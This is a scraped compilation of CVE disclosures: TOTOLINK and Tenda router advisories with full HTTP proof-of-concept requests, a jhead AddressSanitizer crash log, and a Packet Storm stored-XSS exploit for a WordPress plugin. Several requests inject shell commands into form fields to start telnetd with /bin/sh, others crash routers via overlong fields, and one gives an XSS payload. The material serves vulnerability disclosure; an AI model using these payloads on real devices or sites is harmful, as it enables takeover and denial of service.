TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the Host parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `lighttpd` binary:

In `Form_Login` function, `Host` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `Host` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_6/images/1.png)

Through the dynamic debugging of gdb, as you can see here, the parameter(a1+272) points to the content of the Host. It will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_6/images/2.png)

**Supplement**

**This type of buffer overflow appears in various places in the lighttpd file.(Host: ........)**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, you can limit the length of this field.

**PoC**

We set `Host` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa......** , then sending GET request such as:

GET /formLoginAuth.htm?action=login&flag=1 HTTP/1.1
Host: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSION\_ID=2:1591953155:2
Upgrade-Insecure-Requests: 1

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45737: my_vuln/6.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function UploadFirmwareFile. This vulnerability allows attackers to execute arbitrary commands via the parameter FileName.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `UploadFirmwareFile` function, `FileName` is directly passed by the attacker, so we can control the `FileName` to attack the OS.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/1.png)

**Supplement**

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `FileName` as **;/usr/sbin/telnetd;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 86
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/upload.html?time=1639902909084
Cookie: SESSION\_ID=2:1420072624:2

{"topicurl":"UploadFirmwareFile","FileName":";/usr/sbin/telnetd;","ContentLength":"0"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/2.png)

We set `FileName` as **;telnetd -l /bin/sh -p 8888 -b 0.0.0.0;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 106
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/upload.html?time=1639902909084
Cookie: SESSION\_ID=2:1420072624:2

{"topicurl":"UploadFirmwareFile","FileName":";telnetd -l /bin/sh -p 8888 -b 0.0.0.0;","ContentLength":"0"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/3.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/4.png)

Get a shell!

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_8/images/5.png)

CVE-2021-45738: my_vuln/8.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the Form_Login function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the flag parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang,Zuoguang Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn,wangzuoguang16@mails.ucas.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to crash the server.

**Stack Overflow**

In `lighttpd` binary:

In `Form_Login` function, `flag` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `flag` to crash the server.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_5/images/1.png)

**Supplement**

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, the length can be limited to only 2 and must be a number.

**PoC**

We set `flag` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa** , then sending GET request such as:

http://192.168.0.1/formLoginAuth.htm?action=login&flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

GET /formLoginAuth.htm?action=login&flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESSION\_ID=2:1591953155:2
Upgrade-Insecure-Requests: 1

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45739: my_vuln/5.md at main · pjqwudi/my_vuln

TOTOLINK A720R v4.1.5cu.470_B20200911 was discovered to contain a stack overflow in the setWiFiWpsStart function. This vulnerability allows attackers to cause a Denial of Service (DoS) via the pin parameter.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:A720R

Version:A720R\_Firmware(V4.1.5cu.470\_B20200911)

Type:Stack Overflow & Remote Command Execution

Author:Jiaqian Peng,Huizhao Wang,Zuoguang Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn,wangzuoguang16@mails.ucas.ac.cn

**Vulnerability description**

We found an vulnerability in TOTOLINK Technology router with firmware which was released recently.In `setWiFiWpsStart` function, `pin` is directly passed by the attacker, so we can control the `pin` to attack the OS or cause the stack overflow.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `setWiFiWpsStart` function, `pin` is directly passed by the attacker.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/1.png)

As you can see here, there is a **judgment logic** here. If the value of the input character is less than 0x3A, it will be copied to the array(v16). **We can construct the input to fill the /x00 between the two arrays**(v16 and v17), which will cause the sprintf function to copy the contents of the two arrays to the array(v14). Then, the array(v16) as a parameter of system function causes the remote command execution.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setWiFiWpsStart` function,`pin` is directly passed by the attacker.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/1.png)

As you can see here,The length of the input array(v17) is only 28 bytes, we can tamper with the content of the `pin` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/2.png)

**Supplement**

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/4.png)

in the program. In order to avoid such problems, we believe that the string content should be checked in the input extraction part. For example, the length can be limited to only 8 and must be a number.

**PoC**

**Remote Command Execution**

We set `pin` as **11111111111111111111;/bin/telnetd;** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 119
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/wps.html
Cookie: SESSION\_ID=2:1591951164:2

{"wifiIdx":"0","wscMode":"1","pin":"11111111111111111111;/bin/telnetd;","wscDisabled":"0","topicurl":"setWiFiWpsStart"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/5.png)

**Stack Overflow**

We set `pin` as **AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB** , it cause the stack overflow:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 141
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/wps.html
Cookie: SESSION\_ID=2:1591952948:2

{"wifiIdx":"0","wscMode":"1","pin":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB","wscDisabled":"0","topicurl":"setWiFiWpsStart"}

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/6.png)

**Result**

**Remote Command Execution**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/7.png)

**Stack Overflow**

The function return address to be overwritten(ra),This may allows attackers to achieve remote code execution.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/8.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_4/images/9.png)

CVE-2021-45740: my_vuln/4.md at main · pjqwudi/my_vuln

TOTOLINK X5000R v9.1.0u.6118_B20201102 was discovered to contain a stack overflow in the function setIpv6Cfg. This vulnerability allows attackers to cause a Denial of Service (DoS) via the relay6to4 parameters.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:X5000R

Version:X5000R\_Firmware(V9.1.0u.6118\_B20201102)

Type:Stack Overflow

Author:Jiaqian Peng,Huizhao Wang

Institution:pengjiaqian@iie.ac.cn,wanghuizhao@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in TOTOLINK Technology router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `cstecgi.cgi` binary:

In `setIpv6Cfg` function, `relay6to4` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow,so we can control the `relay6to4` to crash the server.

The input has not been checked.And then,call the function nvram\_set to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/1.png)

In `rc` binary:

Eventually, the initial input will be extracted and cause the stack overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/2.png)

As you can see here,The length of the input array(v24) is only 48 bytes and The length of the array(v25) is only 52, we can tamper with the content of the `relay6to4` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/3.png)

But!It is not such a simple operation that can crash the router.The sequence of function calls that caused the vulnerability to be triggered:

`full_restart_ipv6`\->`full_restart_wan`\->`start_wan`\->`wan6_up`\->`sub_4385B4(vuln func)`

As you can see,There is a conditional judgment in the first step:need to set the router mode to bridge.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/4.png)

**Therefore, the complete step to trigger the vulnerability is to first set the router mode to bridge by sending a data packet, and then send a malformed data packet(relay6to4 field).**

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set the router mode to bridge, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 329
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/opmode.html?time=1639968444503
Cookie: SESSION\_ID=2:1420070639:2

{"ssid":"TOTOLINK\_X5000R","key":"","channel":"0","band":"16","bw":"2","countryCode":"US","hssid":"0","wifiOff":"0","wpaMode":"1","ssid\_5g":"TOTOLINK\_X5000R\_5G","key\_5g":"","channel\_5g":"149","band\_5g":"17","bw\_5g":"3","countryCode\_5g":"US","hssid\_5g":"0","wifiOff\_5g":"0","wpaMode\_5g":"1","opmode":"br","topicurl":"setOpModeCfg"}

Then, we set `relay6to4` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 866
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/ipv6.html?time=1639967398362
Cookie: SESSION\_ID=2:1420070429:2

{"dns1":"2001:4860:4860:0:0:0:0:8888","dns2":"","dns3":"","lanRadvFake":"1","lanDhcp":"1","relay6to4":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","sitMtu":"1280","sitTtl":"64","service":"6to4","topicurl":"setIpv6Cfg"}

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45741: my_vuln/11.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetUSBShareInfo. This vulnerability allows attackers to execute arbitrary commands via the usbOrdinaryUserName parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetUSBShareInfo` function, `usbOrdinaryUserName` is directly passed by the attacker, so we can control the `usbOrdinaryUserName` to attack the OS.

As you can see here, the input has not been checked. And then, call the function setValueIfNotNull to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/1.png)

In `netctrl` binary:

In `samba_change_cfg` function, the initial input will be extracted and cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/2.png)

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/3.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `usbOrdinaryUserName` as **`/usr/sbin/telnetd`guest** , and the router will excute it,such as:

POST /goform/setUSB HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/USB/usbFileShare.html?0.38914363317516376
Cookie: \_:USERNAME:\_=; G3v3\_user=

usbPrivilegedUserName=admin&usbPrivilegedUserPwd=admin&usbOrdinaryUserName=\`/usr/sbin/telnetd\`guest&usbOrdinaryUserPwd=guest

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/4.png)

We set `usbOrdinaryUserName` as **`telnetd -l /bin/sh -p 8888 -b 0.0.0.0`guest** , and the router will excute it,such as:

POST /goform/setUSB HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 144
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/USB/usbFileShare.html?0.38914363317516376
Cookie: \_:USERNAME:\_=; G3v3\_user=

usbPrivilegedUserName=admin&usbPrivilegedUserPwd=admin&usbOrdinaryUserName=\`telnetd -l /bin/sh -p 8888 -b 0.0.0.0\`guest&usbOrdinaryUserPwd=guest

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/5.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/6.png)

Get a shell!

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_2/images/7.png)

CVE-2021-45986: my_vuln/2.md at main · pjqwudi/my_vuln

JHEAD is a simple command line tool for displaying and some manipulation of EXIF header data embedded in Jpeg images from digital cameras. In affected versions there is a heap-buffer-overflow on jhead-3.04/jpgfile.c:285 ReadJpegSections. Crafted jpeg images can be provided to the user resulting in a program crash or potentially incorrect exif information retrieval. Users are advised to upgrade. There is no known workaround for this issue.

Bug #1900821 reported by fengzhaoyang on 2020-10-21

This bug affects 1 person

Affects

Status

Importance

Assigned to

Milestone

​

jhead (Ubuntu)

Confirmed ![](https://bugs.launchpad.net/@@/edit)

Undecided

Unassigned

You need to log in to change this bug's status.

Affecting:

jhead (Ubuntu)

Filed here by:

fengzhaoyang

When:

2020-10-21

Confirmed:

2020-10-21

Target

Distribution

Package

(Find…)

Project

(Find…)

Status

Importance

Undecided

Assigned to

Nobody

Me

Comment on this change (optional)

Email me about changes to this bug report

**Bug Description**

fstark@fstark-virtual-machine:~/jhead$ ./jhead fuzz1\\:id\\:000015\\,sig\\:06\\,src\\:000476\\,time\\:412880\\,op\\:arith8\\,pos\\:31\\,val\\:+29  
\=======\=======\=======\=======\=======\=======\=======\=======\=======\==  
\==957==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd2 at pc 0x7f6d38f94676 bp 0x7ffd0abe47d0 sp 0x7ffd0abe3f78  
READ of size 4 at 0x60200000efd2 thread T0  
    #0 0x7f6d38f94675 in memcmp (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x77675)  
    #1 0x40e810 in ReadJpegSections /home/fstark/jhead/jpgfile.c:285  
    #2 0x410e86 in ReadJpegSections /home/fstark/jhead/jpgfile.c:125  
    #3 0x410e86 in ReadJpegFile /home/fstark/jhead/jpgfile.c:378  
    #4 0x40858b in ProcessFile /home/fstark/jhead/jhead.c:905  
    #5 0x402f2c in main /home/fstark/jhead/jhead.c:1756  
    #6 0x7f6d3886a83f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
    #7 0x406708 in \_start (/home/fstark/jhead/jhead+0x406708)

0x60200000efd2 is located 0 bytes to the right of 2-byte region \[0x60200000efd0,0x60200000efd2)  
allocated by thread T0 here:  
    #0 0x7f6d38fb5602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)  
    #1 0x40e4a8 in ReadJpegSections /home/fstark/jhead/jpgfile.c:172

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 memcmp  
Shadow bytes around the buggy address:  
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
\=>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa\[02\]fa fa fa 02 fa  
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
  0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
  Addressable: 00  
  Partially addressable: 01 02 03 04 05 06 07  
  Heap left redzone: fa  
  Heap right redzone: fb  
  Freed heap region: fd  
  Stack left redzone: f1  
  Stack mid redzone: f2  
  Stack right redzone: f3  
  Stack partial redzone: f4  
  Stack after return: f5  
  Stack use after scope: f8  
  Global redzone: f9  
  Global init order: f6  
  Poisoned by user: f7  
  Container overflow: fc  
  Array cookie: ac  
  Intra object redzone: bb  
  ASan internal: fe  
\==957==ABORTING

CVE-2020-26208: Bug #1900821 “heap-buffer-overflow on jhead-3.04/jpgfile.c:285 R...” : Bugs : jhead package : Ubuntu

The Ninja Tables WordPress plugin before 4.1.8 does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

Posted Oct 25, 2021

Authored by Akash Rajendra Patil

WordPress Ninja Tables plugin version 4.1.7 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

MD5 | `1ee321f04776c466b3590854bba610c6`

Download | Favorite | View

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

    # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)# Date: 25-10-2021# Exploit Author: Akash Rajendra Patil# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/# Version: 4.1.7# Tested on Windows*How to reproduce vulnerability:*1. Install Latest WordPress2. Install and activate Ninja Tables <= 4.1.73. Enter JavaScript payload which is mentioned below"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'and enter the data into the user input field.Then Navigate to Table Design5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

**File Tags**

*   ActiveX (932)
*   Advisory (76,655)
*   Arbitrary (14,946)
*   BBS (2,859)
*   Bypass (1,518)
*   CGI (1,009)
*   Code Execution (6,477)
*   Conference (667)
*   Cracker (797)
*   CSRF (3,247)
*   DoS (21,554)
*   Encryption (2,320)
*   Exploit (49,159)
*   File Inclusion (4,121)
*   File Upload (933)
*   Firewall (821)
*   Info Disclosure (2,531)
*   Intrusion Detection (845)
*   Java (2,745)
*   JavaScript (789)
*   Kernel (5,904)
*   Local (13,904)
*   Magazine (586)
*   Overflow (12,045)
*   Perl (1,409)
*   PHP (5,024)
*   Proof of Concept (2,273)
*   Protocol (3,233)
*   Python (1,365)
*   Remote (29,340)
*   Root (3,428)
*   Ruby (564)
*   Scanner (1,628)
*   Security Tool (7,635)
*   Shell (3,014)
*   Shellcode (1,192)
*   Sniffer (877)
*   Spoof (2,064)
*   SQL Injection (15,868)
*   TCP (2,345)
*   Trojan (666)
*   UDP (865)
*   Virus (657)
*   Vulnerability (30,162)
*   Web (8,870)
*   Whitepaper (3,701)
*   x86 (939)
*   XSS (17,211)
*   Other

**File Archives**

*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   May 2021
*   April 2021
*   March 2021
*   February 2021
*   Older

**Systems**

*   AIX (423)
*   Apple (1,860)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,909)
*   Debian (5,947)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,150)
*   HPUX (875)
*   iOS (311)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,376)
*   Mac OS X (682)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (476)
*   RedHat (10,982)
*   Slackware (941)
*   Solaris (1,601)
*   SUSE (1,444)
*   Ubuntu (7,593)
*   UNIX (9,015)
*   UnixWare (182)
*   Windows (6,265)
*   Other

CVE-2021-24900: WordPress Ninja Tables 4.1.7 Cross Site Scripting ≈ Packet Storm

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

Tag

#ubuntu